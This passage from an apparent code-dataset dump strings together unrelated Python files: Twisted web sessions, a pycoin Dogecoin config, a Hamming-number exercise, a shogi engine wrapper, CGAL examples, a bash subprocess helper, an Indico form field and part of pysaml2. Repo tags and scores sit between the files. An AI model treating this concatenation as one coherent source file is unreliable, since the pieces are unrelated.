instance used to compress the stream. @ivar _request: A reference to the originating request. @since: 12.3 """ _zlibCompressor = None def __init__(self, compressLevel, request): self._zlibCompressor = zlib.compressobj( compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS ) self._request = request def encode(self, data): """ Write to the request, automatically compressing data on the fly. """ if not self._request.startedWriting: # Remove the content-length header, we can't honor it # because we compress on the fly. self._request.responseHeaders.removeHeader(b"content-length") return self._zlibCompressor.compress(data) def finish(self): """ Finish handling the request request, flushing any data from the zlib buffer. """ remain = self._zlibCompressor.flush() self._zlibCompressor = None return remain class _RemoteProducerWrapper: def __init__(self, remote): self.resumeProducing = remote.remoteMethod("resumeProducing") self.pauseProducing = remote.remoteMethod("pauseProducing") self.stopProducing = remote.remoteMethod("stopProducing") class Session(components.Componentized): """ A user's session with a system. This utility class contains no functionality, but is used to represent a session. @ivar site: The L{Site} that generated the session. @type site: L{Site} @ivar uid: A unique identifier for the session. @type uid: L{bytes} @ivar _reactor: An object providing L{IReactorTime} to use for scheduling expiration. @ivar sessionTimeout: Time after last modification the session will expire, in seconds. @type sessionTimeout: L{float} @ivar lastModified: Time the C{touch()} method was last called (or time the session was created). A UNIX timestamp as returned by L{IReactorTime.seconds()}. @type lastModified: L{float} """ sessionTimeout = 900 _expireCall = None def __init__(self, site, uid, reactor=None): """ Initialize a session with a unique ID for that session. @param reactor: L{IReactorTime} used to schedule expiration of the session. If C{None}, the reactor associated with I{site} is used. """ super().__init__() if reactor is None: reactor = site.reactor self._reactor = reactor self.site = site self.uid = uid self.expireCallbacks = [] self.touch() self.sessionNamespaces = {} def startCheckingExpiration(self): """ Start expiration tracking. @return: L{None} """ self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire) def notifyOnExpire(self, callback): """ Call this callback when the session expires or logs out. """ self.expireCallbacks.append(callback) def expire(self): """ Expire/logout of the session. """ del self.site.sessions[self.uid] for c in self.expireCallbacks: c() self.expireCallbacks = [] if self._expireCall and self._expireCall.active(): self._expireCall.cancel() # Break reference cycle. self._expireCall = None def touch(self): """ Mark the session as modified, which resets expiration timer. """ self.lastModified = self._reactor.seconds() if self._expireCall is not None: self._expireCall.reset(self.sessionTimeout) version = networkString(f"TwistedWeb/{copyright.version}") @implementer(interfaces.IProtocolNegotiationFactory) class Site(http.HTTPFactory): """ A web site: manage log, sessions, and resources. @ivar requestFactory: A factory which is called with (channel) and creates L{Request} instances. Default to L{Request}. @ivar displayTracebacks: If set, unhandled exceptions raised during rendering are returned to the client as HTML. Default to C{False}. @ivar sessionFactory: factory for sessions objects. Default to L{Session}. @ivar sessions: Mapping of session IDs to objects returned by C{sessionFactory}. @type sessions: L{dict} mapping L{bytes} to L{Session} given the default C{sessionFactory} @ivar counter: The number of sessions that have been generated. @type counter: L{int} @ivar sessionCheckTime: Deprecated and unused. See L{Session.sessionTimeout} instead. """ counter = 0 requestFactory = Request displayTracebacks = False sessionFactory = Session sessionCheckTime = 1800 _entropy = os.urandom def __init__(self, resource, requestFactory=None, *args, **kwargs): """ @param resource: The root of the resource hierarchy. All request traversal for requests received by this factory will begin at this resource. @type resource: L{IResource} provider @param requestFactory: Overwrite for default requestFactory. @type requestFactory: C{callable} or C{class}. @see: L{twisted.web.http.HTTPFactory.__init__} """ super().__init__(*args, **kwargs) self.sessions = {} self.resource = resource if requestFactory is not None: self.requestFactory = requestFactory def _openLogFile(self, path): from twisted.python import logfile return logfile.LogFile(os.path.basename(path), os.path.dirname(path)) def __getstate__(self): d = self.__dict__.copy() d["sessions"] = {} return d def _mkuid(self): """ (internal) Generate an opaque, unique ID for a user's session. """ self.counter = self.counter + 1 return hexlify(self._entropy(32)) def makeSession(self): """ Generate a new Session instance, and store it for future reference. """ uid = self._mkuid() session = self.sessions[uid] = self.sessionFactory(self, uid) session.startCheckingExpiration() return session def getSession(self, uid): """ Get a previously generated session. @param uid: Unique ID of the session. @type uid: L{bytes}. @raise KeyError: If the session is not found. """ return self.sessions[uid] def buildProtocol(self, addr): """ Generate a channel attached to this site. """ channel = super().buildProtocol(addr) channel.requestFactory = self.requestFactory channel.site = self return channel isLeaf = 0 def render(self, request): """ Redirect because a Site is always a directory. """ request.redirect(request.prePathURL() + b"/") request.finish() def getChildWithDefault(self, pathEl, request): """ Emulate a resource's getChild method. """ request.site = self return self.resource.getChildWithDefault(pathEl, request) def getResourceFor(self, request): """ Get a resource for a request. This iterates through the resource hierarchy, calling getChildWithDefault on each resource it finds for a path element, stopping when it hits an element where isLeaf is true. """ request.site = self # Sitepath is used to determine cookie names between distributed # servers and disconnected sites. request.sitepath = copy.copy(request.prepath) return resource.getChildForRequest(self.resource, request) # IProtocolNegotiationFactory def acceptableProtocols(self): """ Protocols this server can speak. """ baseProtocols = [b"http/1.1"] if http.H2_ENABLED: baseProtocols.insert(0, b"h2") return baseProtocols
2.203125
2
pycoin/symbols/doge.py
jaschadub/pycoin
1
1853
from pycoin.networks.bitcoinish import create_bitcoinish_network network = create_bitcoinish_network( symbol="DOGE", network_name="Dogecoin", subnet_name="mainnet", wif_prefix_hex="9e", address_prefix_hex="1e", pay_to_script_prefix_hex="16", bip32_prv_prefix_hex="<KEY>", bip32_pub_prefix_hex="<KEY>")
2.34375
2
Pset/hamming_numbers.py
MarkHershey/python-learning
9
1854
<reponame>MarkHershey/python-learning def hamming(n): """Returns the nth hamming number""" hamming = {1} x = 1 while len(hamming) <= n * 3.5: new_hamming = {1} for i in hamming: new_hamming.add(i * 2) new_hamming.add(i * 3) new_hamming.add(i * 5) # merge new number into hamming set hamming = hamming.union(new_hamming) hamming = sorted(list(hamming)) return hamming[n - 1] print(hamming(970)) # hamming(968) should be 41943040 # hamming(969) should be 41990400 # hamming(970) should be 42187500
4.375
4
examples/run_merger.py
needlehaystack/needlestack
3
1855
import logging from grpc_health.v1 import health_pb2, health_pb2_grpc from grpc_health.v1.health import HealthServicer from needlestack.apis import servicers_pb2_grpc from needlestack.servicers import factory from needlestack.servicers.merger import MergerServicer from examples import configs logging.getLogger("kazoo").setLevel("WARN") def main(): config = configs.LocalDockerConfig() server = factory.create_server(config) manager = factory.create_zookeeper_cluster_manager(config) manager.startup() servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server) health = HealthServicer() health_pb2_grpc.add_HealthServicer_to_server(health, server) health.set("Merger", health_pb2.HealthCheckResponse.SERVING) factory.serve(server) if __name__ == "__main__": main()
1.8125
2
engine_wrapper.py
lidevelopers/Lishogi-Bot-1
0
1856
<filename>engine_wrapper.py<gh_stars>0 import os import shogi import backoff import subprocess from util import * import logging logger = logging.getLogger(__name__) import engine_ctrl @backoff.on_exception(backoff.expo, BaseException, max_time=120) def create_engine(config, board): cfg = config["engine"] engine_path = os.path.realpath(os.path.join(cfg["dir"], cfg["name"])) engine_type = cfg.get("protocol") engine_options = cfg.get("engine_options") commands = [engine_path] if engine_options: for k, v in engine_options.items(): commands.append("--{}={}".format(k, v)) silence_stderr = cfg.get("silence_stderr", False) return USIEngine(board, commands, cfg.get("usi_options", {}), cfg.get("go_commands", {}), silence_stderr) class EngineWrapper: def __init__(self, board, commands, options=None, silence_stderr=False): pass def search_for(self, board, movetime): pass def first_search(self, board, movetime): pass def search(self, game, board, btime, wtime, binc, winc): pass def print_stats(self): pass def get_opponent_info(self, game): pass def name(self): return self.engine.name def report_game_result(self, game, board): pass def quit(self): self.engine.kill_process() def print_handler_stats(self): pass def get_handler_stats(self): pass class USIEngine(EngineWrapper): def __init__(self, board, commands, options, go_commands={}, silence_stderr=False): commands = commands[0] if len(commands) == 1 else commands self.go_commands = go_commands self.engine = engine_ctrl.Engine(commands) self.engine.usi() if options: for name, value in options.items(): self.engine.setoption(name, value) self.engine.isready() def first_search(self, board, movetime): best_move, _ = self.engine.go(board.sfen(), "", movetime=movetime) return best_move def search_with_ponder(self, game, board, btime, wtime, binc, winc, byo, ponder=False): moves = [m.usi() for m in list(board.move_stack)] cmds = self.go_commands if len(cmds) > 0: best_move, ponder_move = self.engine.go( game.initial_fen, moves, nodes=cmds.get("nodes"), depth=cmds.get("depth"), movetime=cmds.get("movetime"), ponder=ponder ) else: best_move, ponder_move = self.engine.go( game.initial_fen, moves, btime=btime, wtime=wtime, binc=binc, winc=winc, byo=byo, ponder=ponder ) return (best_move, ponder_move) def search(self, game, board, btime, wtime, binc, winc): cmds = self.go_commands moves = [m.usi() for m in list(board.move_stack)] best_move, _ = self.engine.go( game.initial_fen, moves, btime=btime, wtime=wtime, binc=binc, winc=winc, depth=cmds.get("depth"), nodes=cmds.get("nodes"), movetime=cmds.get("movetime") ) return best_move def stop(self): self.engine.kill_process() def print_stats(self, stats=None): if stats is None: stats = ['score', 'depth', 'nodes', 'nps'] info = self.engine.info for stat in stats: if stat in info: logger.info("{}: {}".format(stat, info[stat])) def get_stats(self, stats=None): if stats is None: stats = ['score', 'depth', 'nodes', 'nps'] info = self.engine.info stats_str = [] for stat in stats: if stat in info: stats_str.append("{}: {}".format(stat, info[stat])) return stats_str def get_opponent_info(self, game): name = game.opponent.name if name: rating = game.opponent.rating if game.opponent.rating is not None else "none" title = game.opponent.title if game.opponent.title else "none" player_type = "computer" if title == "BOT" else "human" def report_game_result(self, game, board): self.engine.protocol._position(board)
2.234375
2
examples/python/test_as2.py
sloriot/cgal-swig-bindings
0
1857
from CGAL.CGAL_Kernel import Point_2 from CGAL.CGAL_Kernel import Weighted_point_2 from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2 from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2 from CGAL.CGAL_Alpha_shape_2 import Weighted_alpha_shape_2_Face_handle from CGAL.CGAL_Alpha_shape_2 import GENERAL, EXTERIOR, SINGULAR, REGULAR, INTERIOR from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Vertex_handle from CGAL.CGAL_Alpha_shape_2 import Alpha_shape_2_Face_handle from CGAL.CGAL_Alpha_shape_2 import Face_Interval_3 lst = [] lst.append(Point_2(0, 0)) lst.append(Point_2(0, 4)) lst.append(Point_2(44, 0)) lst.append(Point_2(44, 5)) lst.append(Point_2(444, 51)) lst.append(Point_2(14, 1)) t = Alpha_shape_2(lst, 0, GENERAL) t2 = Alpha_shape_2(lst, 0) t.clear() t.make_alpha_shape(lst) for d in t.alpha(): print(d) for v in t.finite_vertices(): type = t.classify(v) print(v.get_range()[0]) if type == INTERIOR: print("INTERIOR") elif type == SINGULAR: print("SINGULAR") elif type == REGULAR: print("REGULAR") elif type == EXTERIOR: print("EXTERIOR") for f in t.finite_faces(): i = f.get_ranges(0) print(i.first) print(i.second) print(i.third) was = Weighted_alpha_shape_2() lst_wp = [] lst_wp.append(Weighted_point_2(Point_2(0, 0), 1)) lst_wp.append(Weighted_point_2(Point_2(0, 4), 1)) lst_wp.append(Weighted_point_2(Point_2(44, 0), 1)) lst_wp.append(Weighted_point_2(Point_2(44, 5), 1)) lst_wp.append(Weighted_point_2(Point_2(444, 51), 1)) lst_wp.append(Weighted_point_2(Point_2(14, 1), 1)) was.make_alpha_shape(lst_wp)
2.328125
2
connections/mode.py
pavithra-mahamani/TAF
0
1858
<reponame>pavithra-mahamani/TAF ''' Created on Jan 18, 2018 @author: riteshagarwal ''' java = False rest = False cli = False
1.078125
1
scene_action2.py
encela95dus/ios_pythonista_examples
36
1859
import scene class MyScene(scene.Scene): def setup(self): self.label_node = scene.LabelNode('A', position=(100,400), parent=self) self.start_flag = False def update(self): if self.start_flag: x,y = self.label_node.position if x < 340: self.label_node.position = (x+2, y) else: self.start_flag = False def touch_ended(self, touch): self.start_flag = True scene.run(MyScene())
3.09375
3
bot/commands/disconnect.py
aq1/vkPostman
1
1860
from bot.commands import BaseCommand import mongo class DisconnectCommand(BaseCommand): _COMMAND = 'disconnect' _DESCRIPTION = 'Close currently active chat.' _SUCCESS_MESSAGE = 'Disconnected from chat' def _callback(self, user, _bot, update, **kwargs): return self._call(user, _bot, update, **kwargs) def _call(self, user, _bot, update, **kwargs): chat = mongo.chats.get_active_chat_by_telegram_id(user.id) if chat: mongo.chats.disable_chat(chat['_id']) return True _bot.send_message( user.id, 'You are not connected to any vk user', ) return False
2.421875
2
pysh/bash_vm/shell_command.py
JordanKoeller/Pysch
0
1861
<reponame>JordanKoeller/Pysch from __future__ import annotations import subprocess import os from typing import List, Dict, Iterator, Optional, Tuple class ShellCommand: def __init__(self, cmd: str): self.run_args = [ "bash", "-c", f'{cmd}' ] # self.run_args: List[str] = [executable, *args] def exec(self, **extra_environ: str) -> ShellCommandOutput: result = subprocess.run(self.run_args, stdout=subprocess.PIPE, env={ **os.environ, **(extra_environ if extra_environ else {}) } ) print("Finished shell command") return ShellCommandOutput(str(result.stdout, 'utf-8'), result.returncode) class ShellCommandOutput: def __init__(self, output_body: str, code: int): self._code = code self._value = output_body @property def succeeded(self) -> bool: return self._code == 0 @property def code(self) -> int: return self._code @property def value(self) -> str: return self._value def lines(self) -> List[ShellCommandOutput]: return [ ShellCommandOutput(substr, self.code) for substr in self.value.splitlines() if substr ] def __iter__(self) -> Iterator[str]: return iter(self._split_tokens()) def __str__(self) -> str: return f'<STDOUT value={self.value} code={self.code} >' def _split_tokens(self) -> List[str]: ret = [] in_quotes = None accumulator: List[str] = [] for char in self.value: if _whitespace(char) and not in_quotes and accumulator: ret.append(''.join(accumulator)) accumulator = [] elif in_quotes == None and _quotes(char): in_quotes = char elif in_quotes and in_quotes == char: in_quotes = None if accumulator: ret.append(''.join(accumulator)) accumulator = [] elif in_quotes and _quotes(char): raise ValueError( f"Found unmatched quote characters in string {self.value}") else: accumulator.append(char) return ret def _quotes(c: str) -> bool: return c in ['"', "'"] def _whitespace(c: str) -> bool: return str.isspace(c)
2.59375
3
indico/web/forms/fields/protection.py
jgrigera/indico
1
1862
<reponame>jgrigera/indico<filename>indico/web/forms/fields/protection.py<gh_stars>1-10 # This file is part of Indico. # Copyright (C) 2002 - 2020 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from __future__ import absolute_import, unicode_literals from flask import render_template from markupsafe import Markup from indico.core.db import db from indico.core.db.sqlalchemy.protection import ProtectionMode from indico.util.i18n import _ from indico.web.forms.fields import IndicoEnumRadioField from indico.web.forms.widgets import JinjaWidget class IndicoProtectionField(IndicoEnumRadioField): widget = JinjaWidget('forms/protection_widget.html', single_kwargs=True) radio_widget = JinjaWidget('forms/radio_buttons_widget.html', orientation='horizontal', single_kwargs=True) def __init__(self, *args, **kwargs): self.protected_object = kwargs.pop('protected_object')(kwargs['_form']) get_acl_message_url = kwargs.pop('acl_message_url', None) self.acl_message_url = get_acl_message_url(kwargs['_form']) if get_acl_message_url else None self.can_inherit_protection = self.protected_object.protection_parent is not None if not self.can_inherit_protection: kwargs['skip'] = {ProtectionMode.inheriting} super(IndicoProtectionField, self).__init__(*args, enum=ProtectionMode, **kwargs) def render_protection_message(self): protected_object = self.get_form().protected_object if hasattr(protected_object, 'get_non_inheriting_objects'): non_inheriting_objects = protected_object.get_non_inheriting_objects() else: non_inheriting_objects = [] if isinstance(protected_object.protection_parent, db.m.Event): parent_type = _('Event') elif isinstance(protected_object.protection_parent, db.m.Category): parent_type = _('Category') else: parent_type = _('Session') rv = render_template('_protection_info.html', field=self, protected_object=protected_object, parent_type=parent_type, non_inheriting_objects=non_inheriting_objects) return Markup(rv)
1.90625
2
src/saml2/saml.py
masterapps-au/pysaml2
0
1863
<reponame>masterapps-au/pysaml2 #!/usr/bin/env python # # Generated Mon May 2 14:23:33 2011 by parse_xsd.py version 0.4. # # A summary of available specifications can be found at: # https://wiki.oasis-open.org/security/FrontPage # # saml core specifications to be found at: # if any question arise please query the following pdf. # http://docs.oasis-open.org/security/saml/v2.0/saml-core-2.0-os.pdf # The specification was later updated with errata, and the new version is here: # https://www.oasis-open.org/committees/download.php/56776/sstc-saml-core-errata-2.0-wd-07.pdf # try: from base64 import encodebytes as b64encode except ImportError: from base64 import b64encode from saml2.validate import valid_ipv4, MustValueError from saml2.validate import valid_ipv6 from saml2.validate import ShouldValueError from saml2.validate import valid_domain_name import saml2 from saml2 import SamlBase import six from saml2 import xmldsig as ds from saml2 import xmlenc as xenc # authentication information fields NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:assertion' # xmlschema definition XSD = "xs" # xmlschema templates and extensions XS_NAMESPACE = 'http://www.w3.org/2001/XMLSchema' # xmlschema-instance, which contains several builtin attributes XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance' # xml soap namespace NS_SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/" # type definitions for xmlschemas XSI_TYPE = '{%s}type' % XSI_NAMESPACE # nil type definition for xmlschemas XSI_NIL = '{%s}nil' % XSI_NAMESPACE # idp and sp communicate usually about a subject(NameID) # the format determines the category the subject is in # custom subject NAMEID_FORMAT_UNSPECIFIED = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified") # subject as email address NAMEID_FORMAT_EMAILADDRESS = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress") # subject as x509 key NAMEID_FORMAT_X509SUBJECTNAME = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:X509SubjectName") # subject as windows domain name NAMEID_FORMAT_WINDOWSDOMAINQUALIFIEDNAME = ( "urn:oasis:names:tc:SAML:1.1:nameid-format:WindowsDomainQualifiedName") # subject from a kerberos instance NAMEID_FORMAT_KERBEROS = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:kerberos") # subject as name NAMEID_FORMAT_ENTITY = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:entity") # linked subject NAMEID_FORMAT_PERSISTENT = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:persistent") # annonymous subject NAMEID_FORMAT_TRANSIENT = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:transient") # subject avaiable in encrypted format NAMEID_FORMAT_ENCRYPTED = ( "urn:oasis:names:tc:SAML:2.0:nameid-format:encrypted") # dicc for avaiable formats NAMEID_FORMATS_SAML2 = ( ('NAMEID_FORMAT_EMAILADDRESS', NAMEID_FORMAT_EMAILADDRESS), ('NAMEID_FORMAT_ENCRYPTED', NAMEID_FORMAT_ENCRYPTED), ('NAMEID_FORMAT_ENTITY', NAMEID_FORMAT_ENTITY), ('NAMEID_FORMAT_PERSISTENT', NAMEID_FORMAT_PERSISTENT), ('NAMEID_FORMAT_TRANSIENT', NAMEID_FORMAT_TRANSIENT), ('NAMEID_FORMAT_UNSPECIFIED', NAMEID_FORMAT_UNSPECIFIED), ) # a profile outlines a set of rules describing how to embed SAML assertions. # https://docs.oasis-open.org/security/saml/v2.0/saml-profiles-2.0-os.pdf # The specification was later updated with errata, and the new version is here: # https://www.oasis-open.org/committees/download.php/56782/sstc-saml-profiles-errata-2.0-wd-07.pdf # XML based values for SAML attributes PROFILE_ATTRIBUTE_BASIC = ( "urn:oasis:names:tc:SAML:2.0:profiles:attribute:basic") # an AuthnRequest is made to initiate authentication # authenticate the request with login credentials AUTHN_PASSWORD = "urn:oasis:names:tc:SAML:2.0:ac:classes:Password" # authenticate the request with login credentials, over tls/https AUTHN_PASSWORD_PROTECTED = \ "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport" # attribute statements is key:value metadata shared with your app # custom format NAME_FORMAT_UNSPECIFIED = ( "urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified") # uri format NAME_FORMAT_URI = "urn:oasis:names:tc:SAML:2.0:attrname-format:uri" # XML-based format NAME_FORMAT_BASIC = "urn:oasis:names:tc:SAML:2.0:attrname-format:basic" # dicc for avaiable formats NAME_FORMATS_SAML2 = ( ('NAME_FORMAT_BASIC', NAME_FORMAT_BASIC), ('NAME_FORMAT_URI', NAME_FORMAT_URI), ('NAME_FORMAT_UNSPECIFIED', NAME_FORMAT_UNSPECIFIED), ) # the SAML authority's decision can be predetermined by arbitrary context # the specified action is permitted DECISION_TYPE_PERMIT = "Permit" # the specified action is denied DECISION_TYPE_DENY = "Deny" # the SAML authority cannot determine if the action is permitted or denied DECISION_TYPE_INDETERMINATE = "Indeterminate" # consent attributes determine wether consent has been given and under # what conditions # no claim to consent is made CONSENT_UNSPECIFIED = "urn:oasis:names:tc:SAML:2.0:consent:unspecified" # consent has been obtained CONSENT_OBTAINED = "urn:oasis:names:tc:SAML:2.0:consent:obtained" # consent has been obtained before the message has been initiated CONSENT_PRIOR = "urn:oasis:names:tc:SAML:2.0:consent:prior" # consent has been obtained implicitly CONSENT_IMPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-implicit" # consent has been obtained explicitly CONSENT_EXPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-explicit" # no consent has been obtained CONSENT_UNAVAILABLE = "urn:oasis:names:tc:SAML:2.0:consent:unavailable" # no consent is needed. CONSENT_INAPPLICABLE = "urn:oasis:names:tc:SAML:2.0:consent:inapplicable" # Subject confirmation methods(scm), can be issued, besides the subject itself # by third parties. # http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0.pdf # the 3rd party is identified on behalf of the subject given private/public key SCM_HOLDER_OF_KEY = "urn:oasis:names:tc:SAML:2.0:cm:holder-of-key" # the 3rd party is identified by subject confirmation and must include a security header # signing its content. SCM_SENDER_VOUCHES = "urn:oasis:names:tc:SAML:2.0:cm:sender-vouches" # a bearer token is issued instead. SCM_BEARER = "urn:oasis:names:tc:SAML:2.0:cm:bearer" class AttributeValueBase(SamlBase): def __init__(self, text=None, extension_elements=None, extension_attributes=None): self._extatt = {} SamlBase.__init__(self, text=None, extension_elements=extension_elements, extension_attributes=extension_attributes) if self._extatt: self.extension_attributes = self._extatt if text: self.set_text(text) elif not extension_elements: self.extension_attributes = {XSI_NIL: 'true'} elif XSI_TYPE in self.extension_attributes: del self.extension_attributes[XSI_TYPE] def __setattr__(self, key, value): if key == "text": self.set_text(value) else: SamlBase.__setattr__(self, key, value) def verify(self): if not self.text and not self.extension_elements: if not self.extension_attributes: raise Exception( "Attribute value base should not have extension attributes" ) if self.extension_attributes[XSI_NIL] != "true": raise Exception( "Attribute value base should not have extension attributes" ) return True else: SamlBase.verify(self) def set_type(self, typ): try: del self.extension_attributes[XSI_NIL] except (AttributeError, KeyError): pass try: self.extension_attributes[XSI_TYPE] = typ except AttributeError: self._extatt[XSI_TYPE] = typ if typ.startswith('xs:'): try: self.extension_attributes['xmlns:xs'] = XS_NAMESPACE except AttributeError: self._extatt['xmlns:xs'] = XS_NAMESPACE if typ.startswith('xsd:'): try: self.extension_attributes['xmlns:xsd'] = XS_NAMESPACE except AttributeError: self._extatt['xmlns:xsd'] = XS_NAMESPACE def get_type(self): try: return self.extension_attributes[XSI_TYPE] except (KeyError, AttributeError): try: return self._extatt[XSI_TYPE] except KeyError: return "" def clear_type(self): try: del self.extension_attributes[XSI_TYPE] except KeyError: pass try: del self._extatt[XSI_TYPE] except KeyError: pass def set_text(self, value, base64encode=False): def _wrong_type_value(xsd, value): msg = 'Type and value do not match: {xsd}:{type}:{value}' msg = msg.format(xsd=xsd, type=type(value), value=value) raise ValueError(msg) # only work with six.string_types _str = unicode if six.PY2 else str if isinstance(value, six.binary_type): value = value.decode('utf-8') type_to_xsd = { _str: 'string', int: 'integer', float: 'float', bool: 'boolean', type(None): '', } # entries of xsd-types each declaring: # - a corresponding python type # - a function to turn a string into that type # - a function to turn that type into a text-value xsd_types_props = { 'string': { 'type': _str, 'to_type': _str, 'to_text': _str, }, 'integer': { 'type': int, 'to_type': int, 'to_text': _str, }, 'short': { 'type': int, 'to_type': int, 'to_text': _str, }, 'int': { 'type': int, 'to_type': int, 'to_text': _str, }, 'long': { 'type': int, 'to_type': int, 'to_text': _str, }, 'float': { 'type': float, 'to_type': float, 'to_text': _str, }, 'double': { 'type': float, 'to_type': float, 'to_text': _str, }, 'boolean': { 'type': bool, 'to_type': lambda x: { 'true': True, 'false': False, }[_str(x).lower()], 'to_text': lambda x: _str(x).lower(), }, 'base64Binary': { 'type': _str, 'to_type': _str, 'to_text': ( lambda x: b64encode(x.encode()) if base64encode else x ), }, 'anyType': { 'type': type(value), 'to_type': lambda x: x, 'to_text': lambda x: x, }, '': { 'type': type(None), 'to_type': lambda x: None, 'to_text': lambda x: '', }, } xsd_string = ( 'base64Binary' if base64encode else self.get_type() or type_to_xsd.get(type(value))) xsd_ns, xsd_type = ( ['', type(None)] if xsd_string is None else ['', ''] if xsd_string == '' else [ XSD if xsd_string in xsd_types_props else '', xsd_string ] if ':' not in xsd_string else xsd_string.split(':', 1)) xsd_type_props = xsd_types_props.get(xsd_type, {}) valid_type = xsd_type_props.get('type', type(None)) to_type = xsd_type_props.get('to_type', str) to_text = xsd_type_props.get('to_text', str) # cast to correct type before type-checking if type(value) is _str and valid_type is not _str: try: value = to_type(value) except (TypeError, ValueError, KeyError): # the cast failed _wrong_type_value(xsd=xsd_type, value=value) if type(value) is not valid_type: _wrong_type_value(xsd=xsd_type, value=value) text = to_text(value) self.set_type( '{ns}:{type}'.format(ns=xsd_ns, type=xsd_type) if xsd_ns else xsd_type if xsd_type else '') SamlBase.__setattr__(self, 'text', text) return self def harvest_element_tree(self, tree): # Fill in the instance members from the contents of the XML tree. for child in tree: self._convert_element_tree_to_member(child) for attribute, value in iter(tree.attrib.items()): self._convert_element_attribute_to_member(attribute, value) # if we have added children to this node # we consider whitespace insignificant # and remove/trim/strip whitespace # and expect to not have actual text content text = ( tree.text.strip() if tree.text and self.extension_elements else tree.text ) if text: #print("set_text:", tree.text) # clear type #self.clear_type() self.set_text(text) # if we have added a text node # or other children to this node # remove the nil marker if text or self.extension_elements: if XSI_NIL in self.extension_attributes: del self.extension_attributes[XSI_NIL] class BaseIDAbstractType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:BaseIDAbstractType element """ c_tag = 'BaseIDAbstractType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['NameQualifier'] = ('name_qualifier', 'string', False) c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False) def __init__(self, name_qualifier=None, sp_name_qualifier=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.name_qualifier = name_qualifier self.sp_name_qualifier = sp_name_qualifier class NameIDType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:NameIDType element """ c_tag = 'NameIDType' c_namespace = NAMESPACE c_value_type = {'base': 'string'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_attributes['NameQualifier'] = ('name_qualifier', 'string', False) c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False) c_attributes['Format'] = ('format', 'anyURI', False) c_attributes['SPProvidedID'] = ('sp_provided_id', 'string', False) def __init__(self, name_qualifier=None, sp_name_qualifier=None, format=None, sp_provided_id=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.name_qualifier = name_qualifier self.sp_name_qualifier = sp_name_qualifier self.format = format self.sp_provided_id = sp_provided_id def name_id_type__from_string(xml_string): return saml2.create_class_from_xml_string(NameIDType_, xml_string) class EncryptedElementType_(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedElementType element """ c_tag = 'EncryptedElementType' c_namespace = NAMESPACE c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedData'] = ( 'encrypted_data', xenc.EncryptedData) c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedKey'] = ( 'encrypted_key', [xenc.EncryptedKey]) c_cardinality['encrypted_key'] = {"min": 0} c_child_order.extend(['encrypted_data', 'encrypted_key']) def __init__(self, encrypted_data=None, encrypted_key=None, text=None, extension_elements=None, extension_attributes=None): SamlBase.__init__(self, text=text, extension_elements=extension_elements, extension_attributes=extension_attributes) self.encrypted_data = encrypted_data self.encrypted_key = encrypted_key or [] def encrypted_element_type__from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedElementType_, xml_string) class EncryptedID(EncryptedElementType_): """The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedID element """ c_tag = 'EncryptedID' c_namespace = NAMESPACE c_children = EncryptedElementType_.c_children.copy() c_attributes = EncryptedElementType_.c_attributes.copy() c_child_order = EncryptedElementType_.c_child_order[:] c_cardinality = EncryptedElementType_.c_cardinality.copy() def encrypted_id_from_string(xml_string): return saml2.create_class_from_xml_string(EncryptedID, xml_string) class Issuer(NameIDType_): """The urn:oasis:names:tc:SAML:2.0:assertion:Issuer element """ c_tag = 'Issuer' c_namespace = NAMESPACE c_children = NameIDType_.c_children.copy() c_attributes = NameIDType_.c_attributes.copy() c_child_order = NameIDType_.c_child_order[:] c_cardinality = NameIDType_.c_cardinality.copy() def issuer_from_string(xml_string): return saml2.create_class_from_xml_string(Issuer, xml_string) class AssertionIDRef(SamlBase): """The urn:oasis:names:tc:SAML:2.0:assertion:AssertionIDRef element """ c_tag = 'AssertionIDRef' c_namespace = NAMESPACE c_value_type = {'base': 'NCName'} c_children = SamlBase.c_children.copy() c_attributes = SamlBase.c_attributes.copy() c_child_order = SamlBase.c_child_order[:] c_cardinality = SamlBase.c_cardinality.copy() def assertion_id_ref_from_string(xml_string): return saml2.create_class_from_xml_string(AssertionIDRef, xml_string) class AssertionURIRef(SamlBase): """The 